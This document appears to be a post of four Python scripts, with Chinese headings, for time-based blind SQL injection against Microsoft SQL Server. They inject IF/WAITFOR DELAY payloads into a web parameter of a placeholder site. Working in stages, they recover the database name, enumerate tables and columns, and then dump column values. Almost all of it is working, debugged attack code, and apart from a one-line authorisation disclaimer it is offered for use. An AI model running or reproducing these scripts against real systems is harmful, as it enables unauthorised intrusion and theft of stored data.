一、爆破当前数据库名
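#coding:utf-8
"""Time-based blind SQL injection (Microsoft SQL Server): recover the current database name.

Every request injects ``IF(<condition>) WAITFOR DELAY`` into the ``classify``
parameter.  A true condition stalls the response, so the round-trip time answers
one yes/no question per request.  Step 1 of 4 (database -> tables -> columns -> values).

Only use this against systems you are explicitly authorised to test.
"""
import requests
import time
import string
import sys

headers = {"user-agent": "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)"}

TARGET = "http://www.xxxx.com/id.aspx"
# The injected delay must exceed THRESHOLD_SECONDS by a clear margin, otherwise a
# true answer (delay + normal latency) is misread as false.  The original paired a
# 1 s delay with a 2 s threshold, which only works on a link slower than 1 s.
DELAY_SECONDS = 3
THRESHOLD_SECONDS = 2.0
REQUEST_TIMEOUT = DELAY_SECONDS + 10   # never block forever on a dead host
MAX_NAME_LENGTH = 50                   # identifiers at or above this length abort
# ASCII window searched per character.  The original 48..122 missed space, '-',
# '$' and similar; non-ASCII characters are not recoverable with ascii() at all.
MIN_CHAR, MAX_CHAR = 32, 126


def ask(condition):
    """Return True if the T-SQL boolean `condition` holds on the target.

    Sends ``classify=1';if(<condition>) waitfor delay '0:0:N' --`` and times
    the round trip.  `requests` percent-encodes the parameter and the server
    decodes it before it reaches the query, so quotes and spaces need no
    manual handling.  A connection that hangs past REQUEST_TIMEOUT raises
    instead of counting as "yes": it is indistinguishable from a dead target.
    """
    payload = "1';if({0}) waitfor delay '0:0:{1}' -- ".format(condition, DELAY_SECONDS)
    started = time.time()
    requests.get(TARGET, params={"classify": payload}, headers=headers,
                 timeout=REQUEST_TIMEOUT)
    return time.time() - started >= THRESHOLD_SECONDS


def find_length(expr, upper):
    """Return len(<expr>) by linear scan, or None if it is not below `upper`.

    The first l for which ``len(expr) > l`` is false is the exact length.
    """
    for candidate in range(upper):
        if not ask("len(({0}))>{1}".format(expr, candidate)):
            return candidate
    return None


def find_char(expr, position):
    """Binary-search the ASCII code of the character at 1-based `position` of <expr>.

    A character outside MIN_CHAR..MAX_CHAR is reported as the nearest bound.
    """
    low, high = MIN_CHAR, MAX_CHAR
    while low < high:
        mid = (low + high) // 2
        if ask("ascii(substring(({0}),{1},1))>{2}".format(expr, position, mid)):
            low = mid + 1   # answer is above mid
        else:
            high = mid      # answer is mid or below
    return chr(low)


def extract(expr, max_length):
    """Recover the whole string <expr> evaluates to, printing progress per character.

    Raises RuntimeError when the length scan reaches `max_length`.
    """
    length = find_length(expr, max_length)
    if length is None:
        raise RuntimeError("length of ({0}) is not below {1}".format(expr, max_length))
    print(" length is " + str(length))
    recovered = ""
    for position in range(1, length + 1):
        recovered += find_char(expr, position)
        print(recovered)
    return recovered


def main():
    """Recover db_name() and print the result list as the original script did."""
    databases = [extract("select db_name()", MAX_NAME_LENGTH)]
    print(databases)


if __name__ == "__main__":
    main()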
二、爆破表名
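#coding:utf-8
"""Time-based blind SQL injection (Microsoft SQL Server): enumerate user table names.

Step 2 of 4.  Fill DB_NAME with the database recovered in step 1.  The
``IF(<condition>) WAITFOR DELAY`` timing oracle is the same as in step 1.

Only use this against systems you are explicitly authorised to test.
"""
import requests
import time
import string
import sys

headers = {"user-agent": "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)"}

TARGET = "http://www.xxxx.com/id.aspx"
DB_NAME = "DB"                          # database name recovered in step 1
# The injected delay must exceed THRESHOLD_SECONDS by a clear margin, otherwise a
# true answer (delay + normal latency) is misread as false.  The original paired a
# 1 s delay with a 2 s threshold, which only works on a link slower than 1 s.
DELAY_SECONDS = 3
THRESHOLD_SECONDS = 2.0
REQUEST_TIMEOUT = DELAY_SECONDS + 10   # never block forever on a dead host
MAX_NAME_LENGTH = 50                   # identifiers at or above this length abort
MAX_ROWS = 1000                        # cap on the number of tables probed
# ASCII window searched per character.  The original 48..122 missed space, '-',
# '$' and similar; non-ASCII characters are not recoverable with ascii() at all.
MIN_CHAR, MAX_CHAR = 32, 126


def ask(condition):
    """Return True if the T-SQL boolean `condition` holds on the target.

    Sends ``classify=1';if(<condition>) waitfor delay '0:0:N' --`` and times
    the round trip.  `requests` percent-encodes the parameter and the server
    decodes it before it reaches the query.  A connection that hangs past
    REQUEST_TIMEOUT raises instead of counting as "yes".
    """
    payload = "1';if({0}) waitfor delay '0:0:{1}' -- ".format(condition, DELAY_SECONDS)
    started = time.time()
    requests.get(TARGET, params={"classify": payload}, headers=headers,
                 timeout=REQUEST_TIMEOUT)
    return time.time() - started >= THRESHOLD_SECONDS


def nth_table(offset):
    """T-SQL for the name of the `offset`-th user table of DB_NAME (0-based, by name).

    Both halves read the same view with the same ORDER BY.  TOP without ORDER BY
    has no defined order, and the original mixed ``DB..sysobjects`` with
    ``sys.tables`` (the *current* database), so names could be skipped or repeated.
    """
    return ("select top 1 name from {db}..sysobjects where xtype='U' and name not in "
            "(select top {n} name from {db}..sysobjects where xtype='U' order by name) "
            "order by name").format(db=DB_NAME, n=offset)


def count_rows(row_expr, upper):
    """Return how many rows `row_expr(offset)` yields for offset = 0, 1, ...

    The first offset whose row has no first character (``ascii(...) > 0`` is
    false, which also covers NULL and empty) is the count; `upper` caps the scan.
    """
    for offset in range(upper):
        if not ask("ascii(substring(({0}),1,1))>0".format(row_expr(offset))):
            return offset
    return upper


def find_length(expr, upper):
    """Return len(<expr>) by linear scan, or None if it is not below `upper`."""
    for candidate in range(upper):
        if not ask("len(({0}))>{1}".format(expr, candidate)):
            return candidate
    return None


def find_char(expr, position):
    """Binary-search the ASCII code of the character at 1-based `position` of <expr>.

    A character outside MIN_CHAR..MAX_CHAR is reported as the nearest bound.
    """
    low, high = MIN_CHAR, MAX_CHAR
    while low < high:
        mid = (low + high) // 2
        if ask("ascii(substring(({0}),{1},1))>{2}".format(expr, position, mid)):
            low = mid + 1   # answer is above mid
        else:
            high = mid      # answer is mid or below
    return chr(low)


def extract(expr, max_length):
    """Recover the whole string <expr> evaluates to, printing progress per character.

    Raises RuntimeError when the length scan reaches `max_length`.
    """
    length = find_length(expr, max_length)
    if length is None:
        raise RuntimeError("length of ({0}) is not below {1}".format(expr, max_length))
    print(" length is " + str(length))
    recovered = ""
    for position in range(1, length + 1):
        recovered += find_char(expr, position)
        print(recovered)
    return recovered


def main():
    """Count the user tables, recover each name, then print them in the original format."""
    total = count_rows(nth_table, MAX_ROWS)
    tables = [extract(nth_table(offset), MAX_NAME_LENGTH) for offset in range(total)]
    for offset, name in enumerate(tables):
        print("第%d表名:%s" % (offset, name))


if __name__ == "__main__":
    main()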
三、爆破字段名
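#coding:utf-8
"""Time-based blind SQL injection (Microsoft SQL Server): enumerate the columns of one table.

Step 3 of 4.  Fill DB_NAME (step 1) and TABLE_NAME (step 2).  The
``IF(<condition>) WAITFOR DELAY`` timing oracle is the same as in step 1.

Only use this against systems you are explicitly authorised to test.
"""
import requests
import time
import string
import sys

headers = {"user-agent": "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)"}

TARGET = "http://www.xxxx.com/id.aspx"
DB_NAME = "DB"                          # database name recovered in step 1
TABLE_NAME = "表名"                     # table name recovered in step 2
# The injected delay must exceed THRESHOLD_SECONDS by a clear margin, otherwise a
# true answer (delay + normal latency) is misread as false.  The original paired a
# 1 s delay with a 2 s threshold, which only works on a link slower than 1 s.
DELAY_SECONDS = 3
THRESHOLD_SECONDS = 2.0
REQUEST_TIMEOUT = DELAY_SECONDS + 10   # never block forever on a dead host
MAX_NAME_LENGTH = 50                   # identifiers at or above this length abort
MAX_ROWS = 1000                        # cap on the number of columns probed
# ASCII window searched per character.  The original 48..122 missed space, '-',
# '$' and similar; non-ASCII characters are not recoverable with ascii() at all.
MIN_CHAR, MAX_CHAR = 32, 126


def ask(condition):
    """Return True if the T-SQL boolean `condition` holds on the target.

    Sends ``classify=1';if(<condition>) waitfor delay '0:0:N' --`` and times
    the round trip.  `requests` percent-encodes the parameter and the server
    decodes it before it reaches the query.  A connection that hangs past
    REQUEST_TIMEOUT raises instead of counting as "yes".
    """
    payload = "1';if({0}) waitfor delay '0:0:{1}' -- ".format(condition, DELAY_SECONDS)
    started = time.time()
    requests.get(TARGET, params={"classify": payload}, headers=headers,
                 timeout=REQUEST_TIMEOUT)
    return time.time() - started >= THRESHOLD_SECONDS


def nth_column(offset):
    """T-SQL for the `offset`-th column name of TABLE_NAME (0-based, by name).

    Object_Id() resolves relative to the *current* database, so the table is
    qualified as ``DB..table`` to match the ``DB..syscolumns`` it is joined to.
    Both halves carry the same ORDER BY: TOP without ORDER BY has no defined
    order, so the offset trick could otherwise skip or repeat names.
    """
    return ("select top 1 name from {db}..syscolumns where id=Object_Id('{db}..{t}') "
            "and name not in (select top {n} name from {db}..syscolumns "
            "where id=Object_Id('{db}..{t}') order by name) "
            "order by name").format(db=DB_NAME, t=TABLE_NAME, n=offset)


def count_rows(row_expr, upper):
    """Return how many rows `row_expr(offset)` yields for offset = 0, 1, ...

    The first offset whose row has no first character (``ascii(...) > 0`` is
    false, which also covers NULL and empty) is the count; `upper` caps the scan.
    """
    for offset in range(upper):
        if not ask("ascii(substring(({0}),1,1))>0".format(row_expr(offset))):
            return offset
    return upper


def find_length(expr, upper):
    """Return len(<expr>) by linear scan, or None if it is not below `upper`."""
    for candidate in range(upper):
        if not ask("len(({0}))>{1}".format(expr, candidate)):
            return candidate
    return None


def find_char(expr, position):
    """Binary-search the ASCII code of the character at 1-based `position` of <expr>.

    A character outside MIN_CHAR..MAX_CHAR is reported as the nearest bound.
    """
    low, high = MIN_CHAR, MAX_CHAR
    while low < high:
        mid = (low + high) // 2
        if ask("ascii(substring(({0}),{1},1))>{2}".format(expr, position, mid)):
            low = mid + 1   # answer is above mid
        else:
            high = mid      # answer is mid or below
    return chr(low)


def extract(expr, max_length):
    """Recover the whole string <expr> evaluates to, printing progress per character.

    Raises RuntimeError when the length scan reaches `max_length`.
    """
    length = find_length(expr, max_length)
    if length is None:
        raise RuntimeError("length of ({0}) is not below {1}".format(expr, max_length))
    print(" length is " + str(length))
    recovered = ""
    for position in range(1, length + 1):
        recovered += find_char(expr, position)
        print(recovered)
    return recovered


def main():
    """Count the columns, recover each name, then print them in the original format."""
    total = count_rows(nth_column, MAX_ROWS)
    columns = [extract(nth_column(offset), MAX_NAME_LENGTH) for offset in range(total)]
    for offset, name in enumerate(columns):
        print("第%d列名:%s" % (offset, name))


if __name__ == "__main__":
    main()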
四、爆破字段值
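#coding:utf-8
"""Time-based blind SQL injection (Microsoft SQL Server): dump the values of one column.

Step 4 of 4.  Fill DB_NAME (step 1), TABLE_NAME (step 2) and COLUMN_NAME
(step 3).  The ``IF(<condition>) WAITFOR DELAY`` timing oracle is the same
as in step 1.

Only use this against systems you are explicitly authorised to test.
"""
import requests
import time
import string
import sys

headers = {"user-agent": "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)"}

TARGET = "http://www.xxxx.com/id.aspx"
DB_NAME = "DB"                          # database name recovered in step 1
TABLE_NAME = "表名"                     # table name recovered in step 2
COLUMN_NAME = "字段名"                  # column name recovered in step 3
# The injected delay must exceed THRESHOLD_SECONDS by a clear margin, otherwise a
# true answer (delay + normal latency) is misread as false.  The original paired a
# 1 s delay with a 2 s threshold, which only works on a link slower than 1 s.
DELAY_SECONDS = 3
THRESHOLD_SECONDS = 2.0
REQUEST_TIMEOUT = DELAY_SECONDS + 10   # never block forever on a dead host
MAX_VALUE_LENGTH = 20                  # original limit; raise it for longer values
MAX_ROWS = 1000                        # cap on the number of values probed
# ASCII window searched per character.  The original 48..122 missed space, '-',
# '@' and similar; non-ASCII characters are not recoverable with ascii() at all.
MIN_CHAR, MAX_CHAR = 32, 126


def ask(condition):
    """Return True if the T-SQL boolean `condition` holds on the target.

    Sends ``classify=1';if(<condition>) waitfor delay '0:0:N' --`` and times
    the round trip.  `requests` percent-encodes the parameter and the server
    decodes it before it reaches the query.  A connection that hangs past
    REQUEST_TIMEOUT raises instead of counting as "yes".
    """
    payload = "1';if({0}) waitfor delay '0:0:{1}' -- ".format(condition, DELAY_SECONDS)
    started = time.time()
    requests.get(TARGET, params={"classify": payload}, headers=headers,
                 timeout=REQUEST_TIMEOUT)
    return time.time() - started >= THRESHOLD_SECONDS


def nth_value(offset):
    """T-SQL for the `offset`-th distinct non-NULL value of COLUMN_NAME (0-based, sorted).

    The original filtered on a hard-coded ``Account`` column while selecting the
    placeholder column, so the two halves of the query disagreed; both now use
    COLUMN_NAME.  NULLs are excluded on both sides because one NULL inside
    ``NOT IN (...)`` makes the outer query return no rows at all, and DISTINCT
    plus a shared ORDER BY keeps the offset walk from repeating duplicates.
    """
    return ("select top 1 {c} from {db}..{t} where {c} is not null and {c} not in "
            "(select distinct top {n} {c} from {db}..{t} where {c} is not null order by {c}) "
            "order by {c}").format(db=DB_NAME, t=TABLE_NAME, c=COLUMN_NAME, n=offset)


def count_rows(row_expr, upper):
    """Return how many rows `row_expr(offset)` yields for offset = 0, 1, ...

    The first offset whose row has no first character (``ascii(...) > 0`` is
    false, which also covers NULL and empty) is the count; `upper` caps the scan.
    """
    for offset in range(upper):
        if not ask("ascii(substring(({0}),1,1))>0".format(row_expr(offset))):
            return offset
    return upper


def find_length(expr, upper):
    """Return len(<expr>) by linear scan, or None if it is not below `upper`."""
    for candidate in range(upper):
        if not ask("len(({0}))>{1}".format(expr, candidate)):
            return candidate
    return None


def find_char(expr, position):
    """Binary-search the ASCII code of the character at 1-based `position` of <expr>.

    A character outside MIN_CHAR..MAX_CHAR is reported as the nearest bound.
    """
    low, high = MIN_CHAR, MAX_CHAR
    while low < high:
        mid = (low + high) // 2
        if ask("ascii(substring(({0}),{1},1))>{2}".format(expr, position, mid)):
            low = mid + 1   # answer is above mid
        else:
            high = mid      # answer is mid or below
    return chr(low)


def extract(expr, max_length):
    """Recover the whole string <expr> evaluates to, printing progress per character.

    Raises RuntimeError when the length scan reaches `max_length`.
    """
    length = find_length(expr, max_length)
    if length is None:
        raise RuntimeError("length of ({0}) is not below {1}".format(expr, max_length))
    print(" length is " + str(length))
    recovered = ""
    for position in range(1, length + 1):
        recovered += find_char(expr, position)
        print(recovered)
    return recovered


def main():
    """Count the distinct values, recover each one, then print them in the original format."""
    total = count_rows(nth_value, MAX_ROWS)
    values = [extract(nth_value(offset), MAX_VALUE_LENGTH) for offset in range(total)]
    for offset, value in enumerate(values):
        print("第%d值:%s" % (offset, value))


if __name__ == "__main__":
    main()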
SQL Server 时间盲注脚本